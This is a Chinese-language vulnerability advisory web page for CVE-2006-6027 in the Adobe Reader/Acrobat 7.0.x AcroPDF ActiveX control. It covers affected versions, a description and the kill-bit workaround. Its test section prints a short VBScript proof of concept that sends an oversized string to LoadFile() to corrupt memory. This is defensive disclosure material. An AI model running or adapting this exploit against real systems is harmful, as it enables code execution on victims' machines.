 |
Adobe Reader/Acrobat AcroPDF.dll ActiveX控件远程代码执行漏洞 |
|
|
| Adobe Reader/Acrobat AcroPDF.dll ActiveX控件远程代码执行漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:19:09 |
|
2006-11-30 17:15:00
发布日期:2006-11-28
更新日期:2006-11-30
受影响系统:
Adobe Acrobat 7.0.0 - 7.0.8
Adobe Adobe Reader 7.0.0 - 7.0.8 描述:
BUGTRAQ ID: 21338,21155
CVE(CAN) ID: CVE-2006-6027
Adobe Reader和Acrobat都是非常流行的PDF文件阅读器。
Adobe Reader和Acrobat的AcroPDF ActiveX控件没有正确处理可能的畸形参数,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
AcroPDF ActiveX控件(AcroPDF.dll)没有正确地处理传送给src()、setPageMode()、setLayoutMode()、setNamedDest()和LoadFile()方法的畸形参数。如果用户受骗访问了特制的web页面的话,就可能会触发内存破坏,导致执行任意指令。
<*来源:FrSIRT
链接:http://www.frsirt.com/english/advisories/2006/4751
http://www.adobe.com/support/security/advisories/apsa06-02.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' id='target'
/>
<script language='vbscript'>
targetFile = "C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroPDF.dll"
prototype = "Function LoadFile ( ByVal fileName As String ) As Boolean"
memberName = "LoadFile"
progid = "AcroPDFLib.AcroPDF"
argCount = 1
arg1=String(6164, "A")
target.LoadFile arg1
</script></job></package>
建议:
临时解决方法:
* 为CLSID {CA8A9780-280D-11CF-A24D-444553540000}设置kill bit,或删除AcroPDF.dll。
厂商补丁:
Adobe
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.adobe.com
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: BlazeVideo BlazeDVD播放列表文件远程栈溢出漏洞
下一篇新闻: Borland IDSQL32.DLL库远程堆溢出漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
